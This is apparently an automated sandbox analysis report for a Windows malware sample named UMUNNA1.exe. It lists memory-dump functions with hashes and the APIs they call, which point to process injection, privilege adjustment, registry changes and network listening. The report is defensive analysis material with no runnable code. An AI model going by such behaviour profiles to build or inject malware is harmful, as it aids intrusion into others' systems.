Opcode Fuzzy Hash: e187ff8525419c879ac0ce3a0392bb55f7d09195676cdccaca05f95bd730e3b2
Instruction Fuzzy Hash: 67229072AD9205DFD3121EFA98F84C57F70FA1676171B4979CC801A029C76DA21FEBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04DB11F5, Relevance: .7, Instructions: 727COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a66e11975cfff108a9b226e6493c41aaa19d6deaf2ca34c6a71970fd4b3311
Instruction ID: 7896bb11ee3d6120f825198a237853bd3e5d710046db261a6f51097ea6365fa7
Opcode Fuzzy Hash: 82a66e11975cfff108a9b226e6493c41aaa19d6deaf2ca34c6a71970fd4b3311
Instruction Fuzzy Hash: 8722A072AD9205DFD3121EFA98F84C57F70FA1676171B4979CC801A029C76DA21FEBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04DB0EE4, Relevance: .7, Instructions: 727COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cdbc8ebf5f3e9ec114cc1460f7e6490ff23ea9ee246e855311fcfc2d05b19a9
Instruction ID: a28a389aa4c9ba5c45bf8568db060146b698657b6ad2bb4e46b1e28181519e6b
Opcode Fuzzy Hash: 5cdbc8ebf5f3e9ec114cc1460f7e6490ff23ea9ee246e855311fcfc2d05b19a9
Instruction Fuzzy Hash: 67229072AD9205DFD3121EFA98F84C57F70FA1676171B4979CC801A029C76DA21FEBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04DB06AB, Relevance: .7, Instructions: 727COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa5a696fc67053a30de1037047bc3bb5988a594673ef13ccffb3b3be2c3a79a2
Instruction ID: 4924137a8525850001d89cfb84b202d70db44df4598a49ebdfea2397d783c7ae
Opcode Fuzzy Hash: fa5a696fc67053a30de1037047bc3bb5988a594673ef13ccffb3b3be2c3a79a2
Instruction Fuzzy Hash: 88229072AD9205DFD3121EFA98F84C57F70FA1676171B4979CC801A029C76DA21FEBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04DB0606, Relevance: .7, Instructions: 727COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598394f57cc7133882db9fe5ab3068378ef297a1b530059952f3b5077010d8f0
Instruction ID: 950c0e44aeb089f56b41b152751e1bbe2e751286dd2518eb2187290ac4ebc32e
Opcode Fuzzy Hash: 598394f57cc7133882db9fe5ab3068378ef297a1b530059952f3b5077010d8f0
Instruction Fuzzy Hash: 41229072AD9205DFD3121EFA98F84C57F30FA1676171B4979CC801A029D76DA21FEBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04DB0FA3, Relevance: .7, Instructions: 727COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d212475cdc1ba032f5865c4b9cb26213f91542bded13b835d858c8d4fcad365
Instruction ID: 29ecb4e40635f17ff665d94bfba38ccf03d8253dd3626227a8336e94e8112b1c
Opcode Fuzzy Hash: 6d212475cdc1ba032f5865c4b9cb26213f91542bded13b835d858c8d4fcad365
Instruction Fuzzy Hash: BE229072AD9205DFD3121EFA98F84C57F30FA1676171B4979CC801A029D76DA21FEBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04DB3D72, Relevance: .7, Instructions: 722COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400aa1590c5260221cdff707f882698714c74abefae71628781b567558b3e0d6
Instruction ID: ceaec4a2d9be7e0f828ae038b72dddbcf8e4c7e11e9a887080f75d62a757f5a3
Opcode Fuzzy Hash: 400aa1590c5260221cdff707f882698714c74abefae71628781b567558b3e0d6
Instruction Fuzzy Hash: 35229172AD9205DFD3121EFA98F84C57F70FA1676175B4979CC801A029C76CA21FEBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005447D6, Relevance: .7, Instructions: 661COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.668843053.0000000000542000.00000002.00020000.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.668832371.0000000000540000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.668942376.00000000005EC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc6c5cdcc9688b75dda941d391bff3095ff6c33afd0eed369a3948d8d70a4166
Instruction ID: 5080583b49234c5c725116920991aad121d214dd1c79e4a9436079602313a91a
Opcode Fuzzy Hash: dc6c5cdcc9688b75dda941d391bff3095ff6c33afd0eed369a3948d8d70a4166
Instruction Fuzzy Hash: E942ACA289E3D15FE7038770097A6907FB29E23214B1F85DBC4C1CF4A3D14A5A9AD732

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: UMUNNA1.exe PID: 5052 Parent PID: 6940 UMUNNA1.exeCOMMON

Executed Functions

Function 04CB6048, Relevance: 15.9, Strings: 12, Instructions: 868COMMON

Download Yara Rule

Strings

:@fq, xrefs: 04CB6622
:@fq, xrefs: 04CB6B09
:@fq, xrefs: 04CB611F
:@fq, xrefs: 04CB6428
:@fq, xrefs: 04CB622E
:@fq, xrefs: 04CB69ED
:@fq, xrefs: 04CB6C25
:@fq, xrefs: 04CB6787
:@fq, xrefs: 04CB6525
:@fq, xrefs: 04CB6D44
:@fq, xrefs: 04CB6E63
:@fq, xrefs: 04CB632B

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID: :@fq$:@fq$:@fq$:@fq$:@fq$:@fq$:@fq$:@fq$:@fq$:@fq$:@fq$:@fq
API String ID: 0-1395825472
Opcode ID: 9c99883e1433f212f0ceb7dc9ee990baf492c8ff05e7e7e05625c00d61c589b4
Instruction ID: 644145601626e0c90a055c8ad82dc43b03bd90754647e50da2346362d971f210
Opcode Fuzzy Hash: 9c99883e1433f212f0ceb7dc9ee990baf492c8ff05e7e7e05625c00d61c589b4
Instruction Fuzzy Hash: AF92B274A022288FDB69DF24C850BDEB7B2BF8A304F1084E9D94967395CB359E91CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0A50, Relevance: 3.1, APIs: 2, Instructions: 116synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04CE09F9
listen.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE0AE4

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: CreateMutexlisten
String ID:
API String ID: 2713436074-0
Opcode ID: cde27b5779878077a3653a90a24ab5602f762c421a9a9a26892ea2b676efbb43
Instruction ID: 6ea0f8191909db1051fb4ddacc2c76d6264b04880373a96c98f5753e19bae8f2
Opcode Fuzzy Hash: cde27b5779878077a3653a90a24ab5602f762c421a9a9a26892ea2b676efbb43
Instruction Fuzzy Hash: E541B4B15053849FE712CF55DC45BA6BFE8EF06324F1884AAE9848F153D374A905CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04CB1DA8, Relevance: 1.6, Instructions: 1631COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee36e30ac4443c77fa4ecaf75cb04a6195bf27d3236f52703a30a1f40818d30a
Instruction ID: c82b83ee397dad653f63752a0f01ad6cbc17b5f2c785cc5de60c01a96c737f96
Opcode Fuzzy Hash: ee36e30ac4443c77fa4ecaf75cb04a6195bf27d3236f52703a30a1f40818d30a
Instruction Fuzzy Hash: 1A03CE74E012298FDB65DF68C884BEDB7B6BB49304F1085EAD509A7394DB34AE84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0E6B, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE0EFF

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 29a8ccc20eb0262ff302b9e327a0d8a5869ad574309c520841b0304a5086b380
Instruction ID: 8d48bbda5e83fe8e29a442c023327842c0d71d36fa85d72b015b6fcd8f950b0d
Opcode Fuzzy Hash: 29a8ccc20eb0262ff302b9e327a0d8a5869ad574309c520841b0304a5086b380
Instruction Fuzzy Hash: EC2180B15093846FD712CF65CC84BA6BFB8EF06320F0884ABE9848F152D374A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE543F, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04CE54BF

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 165a9a3dc131ff0125a23812086d1b39eca1763b320c0345ec51f8e84e794ba2
Instruction ID: 07d14b163a049d796abddf21b05f9f7218eff252059000607d8a6056b8a10b14
Opcode Fuzzy Hash: 165a9a3dc131ff0125a23812086d1b39eca1763b320c0345ec51f8e84e794ba2
Instruction Fuzzy Hash: A321BF75509380AFDB228F25DC40B62BFF4EF06214F08849AE9858F163D331A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0E9E, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE0EFF

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 90293b2d6a32a085b2afd9ea0b8d0f24b60b2edb6dbdecee6b7de35f95a49e29
Instruction ID: a25bfcdf8d02ee336c60db2b4a94553576225a5136e70e59fc6b89d124f7fbfe
Opcode Fuzzy Hash: 90293b2d6a32a085b2afd9ea0b8d0f24b60b2edb6dbdecee6b7de35f95a49e29
Instruction Fuzzy Hash: BC11B2B1504304AFE721CF56DC85FA6FBA8EF04320F18C46AED459B246D774E504CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE5669, Relevance: 1.6, APIs: 1, Instructions: 60nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04CE56D4

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 03e95d3385e2cc897c79aebbcc3629f73d22f7a3dd62907e33b0ab06d40b9378
Instruction ID: 5d26b5685d867bf1be599207f1e12e3b94bd07412722180994a7c1835e027d5a
Opcode Fuzzy Hash: 03e95d3385e2cc897c79aebbcc3629f73d22f7a3dd62907e33b0ab06d40b9378
Instruction Fuzzy Hash: A911AC72408380AFEB228F55DC40BA2FFF4EF46220F08849AED848B112C335A518DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0A8E, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

listen.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE0AE4

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: listen
String ID:
API String ID: 3257165821-0
Opcode ID: d7c4dc94aac075eb4531bb392fc1408ca59a716fd3b2b9c2c52802875c2bea07
Instruction ID: 8c98522a0fe59f427bb63a47d9b4cd4a80e4e99d524f922e074339d0d3b7a69f
Opcode Fuzzy Hash: d7c4dc94aac075eb4531bb392fc1408ca59a716fd3b2b9c2c52802875c2bea07
Instruction Fuzzy Hash: F311E5B1500304AFEB21DF56DC85B66FBA8EF04320F1884AAED449F246E374E504CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE5476, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04CE54BF

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 75145a5affa0f2c68b2add8a2104a83852701f867ecdb50f722ddcdb5fdb7696
Instruction ID: c126d9c3970511daf8ecca3c9edb7d9e7b1d2841930c752040a1b6562517bfaf
Opcode Fuzzy Hash: 75145a5affa0f2c68b2add8a2104a83852701f867ecdb50f722ddcdb5fdb7696
Instruction Fuzzy Hash: 2D115E756003009FDB21CF9AD844B66FBE5EF04221F08846AED468B656E335E514DF71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE55DC, Relevance: 1.5, APIs: 1, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 04CE5623

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7f8bc84bcdd5fc892ed1c965f289229cf0274e047312619f8a5c9df43c35d154
Instruction ID: 5a9c849c834b2d83a9b564ebcfb8d4532532d85c832be3889d16072a27396e18
Opcode Fuzzy Hash: 7f8bc84bcdd5fc892ed1c965f289229cf0274e047312619f8a5c9df43c35d154
Instruction Fuzzy Hash: 9D015E75504344AFEB20CF46DD84B66FFE8EB44725F08C8AAED498B216D375A904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE5696, Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04CE56D4

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 16b1731347e594a4c7062b688d666b1190b6d61d5d0c314030aa23ef6be78aeb
Instruction ID: c9b918d7fd7b6b1e6dad015f2ffda0b30cf14498cadeeccad61998435b37b5b0
Opcode Fuzzy Hash: 16b1731347e594a4c7062b688d666b1190b6d61d5d0c314030aa23ef6be78aeb
Instruction Fuzzy Hash: 89018C75504300EFDB21CF96D844B66FBE4EF04320F0884AADD498B616E375A418DFB2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE5534, Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04CE5581

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 16497984eaecfb3ebe1ceed235adee54e49882337e55027b71bc2367dceb0eef
Instruction ID: c22964b589f103fc3d064cfd2014f278c95b8b4b156aa37492aa7cf440b7e505
Opcode Fuzzy Hash: 16497984eaecfb3ebe1ceed235adee54e49882337e55027b71bc2367dceb0eef
Instruction Fuzzy Hash: 2D018876400344AFEB208E46DD84B62FBA8EB48724F08845AEE894A212D371A918CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA09A, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00CBA0D5

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: eb35a59671bf4adcfb3869e7d9d2bccb735657ccdd54d102d324d70e57a8e7d7
Instruction ID: b6cf733c01432a871610c1614a0a5087443b9407e17b6e2c77a15cff60a1d120
Opcode Fuzzy Hash: eb35a59671bf4adcfb3869e7d9d2bccb735657ccdd54d102d324d70e57a8e7d7
Instruction Fuzzy Hash: 35019E71400340DFDB60DF5AD844BA6FBA4EF04320F1884AADD898B616D375A408DB72

Uniqueness

Uniqueness Score: -1.00%

Function 04CE55EE, Relevance: 1.5, APIs: 1, Instructions: 40nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 04CE5623

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b428c70505f86bf80cc4cb8b62050f5051ae167f0874e9912a02949638ce2c1b
Instruction ID: 1db1801cc88f4630d8b9425a5284af717211a8e683de072f7d320e1b889ca456
Opcode Fuzzy Hash: b428c70505f86bf80cc4cb8b62050f5051ae167f0874e9912a02949638ce2c1b
Instruction Fuzzy Hash: 57017C71904240DFDB20CF96D884765FBA4EF04324F08C4AADD498B616E379A504CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE5546, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04CE5581

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: ae8d5a3db0a8b6deb60ccf4bf4f48e49887a3705eba3e458305cd3e68257afd5
Instruction ID: 63ff14d1eef1125642a299ab5d24af84b95e42b73d751808b6b4290daa899dbe
Opcode Fuzzy Hash: ae8d5a3db0a8b6deb60ccf4bf4f48e49887a3705eba3e458305cd3e68257afd5
Instruction Fuzzy Hash: C5017C755043009FDB208F96D844B61FBA1EF08324F08849ADD890A616E375A518DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CB9DA0, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce2cd85f10e9e1604f51e0bbabc477b6772570709fd91e42335b657ae98881e
Instruction ID: 5e2a0c510d525246906fa3383dde88284da38b3d55208863887a160cdfc29967
Opcode Fuzzy Hash: cce2cd85f10e9e1604f51e0bbabc477b6772570709fd91e42335b657ae98881e
Instruction Fuzzy Hash: F3510370D06218CFEB24DFA9D844BEDBBF2AF49304F1495AAD508B7290D7355A84CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CB4B98, Relevance: 4.4, Strings: 3, Instructions: 636COMMON

Download Yara Rule

Strings

:@fq, xrefs: 04CB51F1
:@fq, xrefs: 04CB5362
:@fq, xrefs: 04CB4D7A

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID: :@fq$:@fq$:@fq
API String ID: 0-3738185570
Opcode ID: c61d7196749cd6dec77da41c9ef7ba768fdbab8047d625ee54b24a456f95dee1
Instruction ID: af5ec537218df74c9e32113bbc4036a4b65e798740c352f0e2f46996d28b7579
Opcode Fuzzy Hash: c61d7196749cd6dec77da41c9ef7ba768fdbab8047d625ee54b24a456f95dee1
Instruction Fuzzy Hash: 9D62BD34A062288FEB24DF24C950BDDBBB2BF4A304F1045E9D909A7395DB35AE81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2FED, Relevance: 3.1, APIs: 2, Instructions: 104COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE2F85
GetPerAdapterInfo.IPHLPAPI(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE3077

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: AdapterAdaptersAddressesInfo
String ID:
API String ID: 4108532965-0
Opcode ID: f1af2dd85f19623f6b9897563497ebc2868db10529e4a311b36c5519f323cc57
Instruction ID: 8604de537fda46f4119a5b692223ab4776f3c66e35052bcc8c730f2b56ae06ac
Opcode Fuzzy Hash: f1af2dd85f19623f6b9897563497ebc2868db10529e4a311b36c5519f323cc57
Instruction Fuzzy Hash: 3B3190715093845FE7228F15DC45F76FFA8EF46320F0885DBED858B262D364A648CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CB4B87, Relevance: 2.9, Strings: 2, Instructions: 430COMMON

Download Yara Rule

Strings

:@fq, xrefs: 04CB51F1
:@fq, xrefs: 04CB4D7A

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID: :@fq$:@fq
API String ID: 0-2474355454
Opcode ID: 081587cda02eefb39b19a551726bda03e32576e78596b731d8f2d2898b0226ae
Instruction ID: 74db32e0bc38e3dbe5ec93dd341eef939e6ad553d19a3709fa7c42f5e04a5a08
Opcode Fuzzy Hash: 081587cda02eefb39b19a551726bda03e32576e78596b731d8f2d2898b0226ae
Instruction Fuzzy Hash: B912F034A062288FEB24DF64C954BEDBBB2BF49304F1081E9DA0967395DB349E81DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB729, Relevance: 1.6, APIs: 1, Instructions: 148registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 00CBB802

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: be360db87fa2d413f7bf341c68c16db8046d6041801e0fc58167775859aac53b
Instruction ID: 384d91380d95495ff00e1f53db290c7ac0af90ccb05cbee93f7a87371663f70b
Opcode Fuzzy Hash: be360db87fa2d413f7bf341c68c16db8046d6041801e0fc58167775859aac53b
Instruction Fuzzy Hash: 9F51797540A3C09FD3138B259C55B61BFB4EF47220F0A85DBD8848F2A3D669A909C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE3B98, Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 04CE3CC7

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: a0ac83fb28c0e3a33076dfb8c99e729797871093110932046844798a261ccc74
Instruction ID: e4229653b626856925a786456063101f797ddb23098da04bc779ece69ed7c833
Opcode Fuzzy Hash: a0ac83fb28c0e3a33076dfb8c99e729797871093110932046844798a261ccc74
Instruction Fuzzy Hash: 82515F7100D3C06FE7238B258C65B66BFB9AF07314F1A44DBE9849F0A3D264A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 04CE30B4, Relevance: 1.6, APIs: 1, Instructions: 127COMMON

Download Yara Rule

APIs

getnameinfo.WS2_32(?,00000E2C), ref: 04CE31A5

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: getnameinfo
String ID:
API String ID: 1866240144-0
Opcode ID: b624fed4d8c6b3620ca7f01d336b384bb3b4337bfa1c680eb808e1bf5491c79c
Instruction ID: 1939104ef9d398a4b6a838575f50b0126b23d3e9c203a72c7b8a7aaaff76cb0c
Opcode Fuzzy Hash: b624fed4d8c6b3620ca7f01d336b384bb3b4337bfa1c680eb808e1bf5491c79c
Instruction Fuzzy Hash: 454160B64083C46FE712CB658C51FA6BFB8EF06310F0984DFE9818B0A3D665A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 04CE3392, Relevance: 1.6, APIs: 1, Instructions: 112networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE3479

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 093bf6af06d4682d4b78356b68095995da3292f2abeab9c4de9a2f95fdf50bfd
Instruction ID: 56c8975c53debd7c2ef6f66db275c2d30eb6cf2b62d85ee5bdffd4a67379994f
Opcode Fuzzy Hash: 093bf6af06d4682d4b78356b68095995da3292f2abeab9c4de9a2f95fdf50bfd
Instruction Fuzzy Hash: 26412A7150D7C06FD7238B658C54B62BFB8AF07210F0984DBE985CB1A3D228A849CB72

Uniqueness

Uniqueness Score: -1.00%

Function 04CE516F, Relevance: 1.6, APIs: 1, Instructions: 110processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,00000E2C), ref: 04CE525C

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f184c9ca541456092b2d4221bb012b96ee9c5b5eb9bdcb64e25b62b64156c12c
Instruction ID: fa06bf25961eebe5e8ba3b2399a8c8b74487eb47a5854a5ebb10e6d5f1e7bb72
Opcode Fuzzy Hash: f184c9ca541456092b2d4221bb012b96ee9c5b5eb9bdcb64e25b62b64156c12c
Instruction Fuzzy Hash: 68319E71100301AFEB32CF65CC41FA6BBEDEF04710F14895AF9458A192D365F949CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04CE368A, Relevance: 1.6, APIs: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 04CE3741

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 672408a1e2190f07995329459595d8e104d4bce2317010d8efa14bb314e76842
Instruction ID: 3a427d3f241d57472aa017882f0e31b4d7c06cd266f9c2d640bdbf003021f79f
Opcode Fuzzy Hash: 672408a1e2190f07995329459595d8e104d4bce2317010d8efa14bb314e76842
Instruction Fuzzy Hash: 343172B1408784AFE7228F65DC45FA6BFB8EF06310F08889BE9859B153D264E509C761

Uniqueness

Uniqueness Score: -1.00%

Function 04CE207C, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 04CE215A

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: 839373c00af3d809ad11fddf49b5d9174ca97c5ccfe8574659c1c89689b94e33
Instruction ID: a6ef1735e719eeb30cf37b56faeffca66c828766ff3c6fdc15c8649052664170
Opcode Fuzzy Hash: 839373c00af3d809ad11fddf49b5d9174ca97c5ccfe8574659c1c89689b94e33
Instruction Fuzzy Hash: 1E316B7540E7C05FD7138B358C65AA1BFB4EF47624B0E40DBD8848F1A3D2286909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4936, Relevance: 1.6, APIs: 1, Instructions: 102registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE4A00

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 004696afbbc0f78db01aebfde37c5ba693c21702f682023dc5043804b9a3825a
Instruction ID: 9cfb8651ccf5a9a3e2727821c208da39a23a751c3080e1083a31c03cea80bb74
Opcode Fuzzy Hash: 004696afbbc0f78db01aebfde37c5ba693c21702f682023dc5043804b9a3825a
Instruction Fuzzy Hash: E1314D7100D3C06FD7238B259C55B62BFB99F07220F0985DBE9C5DB1A3D268A949CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CBBBF3, Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00CBBCA9

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
